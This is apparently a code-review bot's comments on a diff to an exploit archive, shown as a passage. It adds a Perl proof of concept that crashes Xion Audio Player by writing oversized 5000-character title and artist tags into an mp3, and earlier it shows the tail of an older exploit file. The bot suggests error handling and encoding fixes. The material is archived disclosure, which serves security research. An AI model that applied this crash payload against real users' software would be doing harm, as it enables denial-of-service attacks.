EOT
}
exit 0;
}
}
# milw0rm.com [2004-12-15]
}
exit 0;
}
}
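Review bot: The quoted-printable clean-up on the copyright line is lossy: the old side's `Min=C3=A1=C5=99` is the UTF-8 encoding of `Minář`, but the new line reads `# Copyright 2004 Jan Min???? (jjminar fastmail fm)`, replacing the author's name with four question marks. Decoding the bytes as UTF-8 and writing `# Copyright 2004 Jan Minář (jjminar fastmail fm)` (with the file saved as UTF-8) keeps the attribution intact; the `=3D` and `=20` replacements elsewhere in these hunks decode correctly. On the new side, `/^Range: bytes=\(33\)-/` has no capture group because the parentheses are escaped, so `$1` in the following `print LOG "File if $1 bytes long\n"` is presumably always undefined (and `-W` will warn); if the intent is to log the offset, `/^Range: bytes=(\d+)-/` captures it. The `while(<STDIN>)` loop these branches belong to starts in the `@ -37` hunk and its body continues across the later hunks.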

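--- /dev/null
+++ b/platforms/windows/dos/39654.pl
@@ -0,0 +1,23 @@
+# Exploit Title: Xion Audio Player <= 1.5 (build 160) - Crash PoC
+# Date: 01-04-2016
+# Software Link: http://www.r2.com.au/downloads/files/xion-audio-player-v1.5b160.zip
+# Homepage: http://www.xionplayer.com/
+# Exploit Author: Charley Celice (stmerry)
+# Contact: https://twitter.com/charleycelice
+#
+# Category: Crash PoC
+# Tested on: Windows XP SP3 English
+# Details: Overflowing title/artist tags on an *.mp3 seems to crash the software.
+# (works on both standalone/portable versions)
+use MP3::Tag;
+$mp3 = MP3::Tag->new('legit.mp3'); # whatever mp3 you got handy
+$mp3->title_set('A' x 5000); # title/artist tags
+$mp3->artist_set('A' x 5000); # may vary although both seems to be needed
+$mp3->update_tags();
+$mp3->close();
+print "[*] Completed.\n";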
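Review bot: `MP3::Tag->new('legit.mp3')` is used without checking its return value; the constructor appears to return undef when the file cannot be opened, so a missing `legit.mp3` makes the script die on the next line with "Can't call method "title_set" on an undefined value" instead of naming the cause. `my $mp3 = MP3::Tag->new('legit.mp3') or die "cannot open legit.mp3: $!";` reports the real problem. The file also runs without `use strict; use warnings;`, leaving `$mp3` an undeclared package global; adding the two pragmas after the header comment and declaring the variable with `my` costs nothing here. `update_tags()` is likewise called without checking its result, so a failed write would still print `[*] Completed.`.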